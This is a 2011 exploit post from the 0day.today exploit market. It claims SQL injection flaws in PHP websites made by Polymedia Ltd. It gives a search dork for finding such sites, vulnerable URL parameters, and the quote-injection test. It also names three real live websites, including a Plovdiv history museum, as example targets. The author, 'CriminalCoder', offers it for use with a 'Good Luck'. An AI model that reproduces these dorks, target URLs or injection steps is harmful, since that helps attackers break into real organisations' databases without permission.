[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Polymedia Ltd. SQL injection Vulnerability

Author
CriminalCoder
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16350
Category
web applications
Date add
16-06-2011
Platform
php
=====================================
[+] Exploit Title : Polymedia Ltd. SQL injection Vulnerability
[+] Author : CriminalCoder
[+] Category : WebApps
[+] d0rk : "Website by Polymedia Ltd." "inurl:php?="
[+] Vendor : http://www.polymedia-bg.com/
[+] Twitter : http://twitter.com/CriminalCoder
[+] Live Contact : criminalcoder@hotmail.de
[+] Tested on : Windows XP SP3

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[+]   Exploit:

››http://localhost/front/news_details.php?*={valid id}
››http://localhost/front/details.php?*={valid id}
››http://localhost/front/index.php?*={valid id}

Check all .php?*= mostly all vuln.. to sql-i.!

››http://localhost/front/news_details.php?*=' > {sql error} 
››http://localhost/front/details.php?*= sql here

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[+]   Example:

››http://transfer.bg/front/details.php?prod_id=4'
››http://mpd-bg.com/front/news_details.php?id=2'
››http://www.historymuseumplovdiv.org/front/index.php?tid=10'

Good Luck aLL :)

=========greetz to===========
KnocKout ~ TechnicaL ~ NosleeP++ ~
Redd.é ~ SanaLtahriP ~ TheMirkin ~
DeadMaster ~ and all my friends...
==========================




#  0day.today [2024-11-16]  #